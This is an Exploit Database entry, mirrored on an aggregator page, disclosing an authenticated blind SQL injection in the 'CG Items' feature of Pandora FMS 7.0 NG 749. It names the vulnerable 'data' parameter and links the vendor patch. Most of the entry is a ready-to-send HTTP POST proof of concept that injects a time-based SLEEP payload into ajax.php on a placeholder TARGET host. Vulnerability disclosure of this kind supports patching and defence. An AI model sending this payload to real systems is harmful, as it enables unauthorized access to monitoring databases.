Pandora FMS 7.0 NG 749 – ‘CG Items’ SQL Injection (Authenticated)

• Exploit Database
• 18 阅读

• 作者： Matthew Aberegg
  日期： 2020-11-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49046/

• # Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
  # Date: 11-14-2020
  # Exploit Author: Matthew Aberegg, Alex Prieto
  # Vendor Homepage: https://pandorafms.com/
  # Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e
  # Software Link: https://pandorafms.com/community/get-started/
  # Version: Pandora FMS 7.0 NG 749
  # Tested on: Ubuntu 18.04
  
  
  # Vulnerability Details
  # Description : A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS.
  # Vulnerable Parameter : data
  
  
  # POC
  
  POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1
  Host: TARGET
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 23
  Origin: http://TARGET
  Connection: close
  Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events
  Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
  
  page=general%2Fcg_items